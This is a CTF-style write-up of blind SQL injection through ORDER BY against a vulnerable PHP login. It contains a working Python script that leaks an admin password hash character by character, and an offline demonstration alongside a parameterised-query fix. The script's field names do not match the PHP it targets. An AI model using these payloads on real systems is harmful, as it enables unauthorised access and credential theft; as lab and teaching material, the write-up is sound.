SQLi - blind injection using the ORDER BY characteristic
in PENETRATIONCTF with 0 comment


Exploitation scenario

Login code:

$username = $_POST['username'];
$password = $_POST['password'];
if (filter($username)) {
    // parentheses are filtered out, so the injection cannot call functions
} else {
    $sql = "SELECT * FROM admin WHERE username='" . $username . "'";
    $result = mysql_query($sql);
    @$row = mysql_fetch_array($result);   // only the first row is ever examined
    if (isset($row) && $row['username'] === 'admin') {
        if ($row['password'] === md5($password)) {
            // Login successful
        } else {
            die("password error!");
        }
    } else {
        die("username does not exist!");
    }
}

Exploit script I wrote:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

url = "http://127.0.0.1/orderby-blind.php"
# The guess is placed in the third column; ORDER BY 3 sorts it against the
# real hash, so which row comes first decides which error message is shown.
exploit = "' or 1 union select 1,2,'{0}{1}' order by 3 #"
payloads = "0123456789abcdefghijklmnopqrstuvwxyz"
passwd = ""
for i in range(1, 32):
    for p in payloads:
        exp = exploit.format(passwd, p)
        data = {"uname": exp, "passwd": "drop"}
        res = requests.post(url, data=data)
        # "password error!" means the admin row sorted first, i.e. the current
        # guess is already greater than the hash, so the previous candidate
        # character is the correct one.
        if "password error!" in res.text:
            passwd += payloads[payloads.index(p) - 1]
            print(passwd)
            break
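The oracle behind the script, reproduced offline as an added example (not the author's code): SQLite stands in for MySQL (so the comment marker is `--` instead of `#`), the admin table is assumed to have three columns, and the same first-row login logic is shown beside a parameterised query that removes the leak entirely.

```python
import hashlib
import sqlite3

# Constructed stand-in for the page's MySQL table: one admin row whose stored
# value is md5("password"). SQLite is used so this runs offline.
ADMIN_HASH = hashlib.md5(b"password").hexdigest()


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    return db


def check_row(row, password):
    # Mirrors the PHP above: only the first row decides which message is shown.
    if row is None or row[1] != "admin":
        return "username does not exist!"
    if row[2] != hashlib.md5(password.encode()).hexdigest():
        return "password error!"
    return "login ok"


def login_vulnerable(db, username, password):
    # String concatenation exactly as in the page's PHP: the input becomes SQL.
    sql = "SELECT * FROM admin WHERE username='" + username + "'"
    return check_row(db.execute(sql).fetchone(), password)


def login_fixed(db, username, password):
    # Parameterised query: the input is bound as a value, so UNION / ORDER BY
    # in it are just characters of a username that does not exist.
    sql = "SELECT * FROM admin WHERE username=?"
    return check_row(db.execute(sql, (username,)).fetchone(), password)


def oracle_leaks(db, guess):
    # The UNION row carries the guess in the password column; ORDER BY 3 sorts
    # the real hash against it. If the guess is greater, the admin row comes
    # first and the message flips to "password error!": one bit per request.
    payload = "' or 1 union select 1,2,'%s' order by 3 --" % guess
    return login_vulnerable(db, payload, "x") == "password error!"
```

Note that the leak exists whichever comparison happens afterwards: the two distinct error messages plus attacker-controlled ordering are enough, so the fix is the bound parameter, not a different message.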
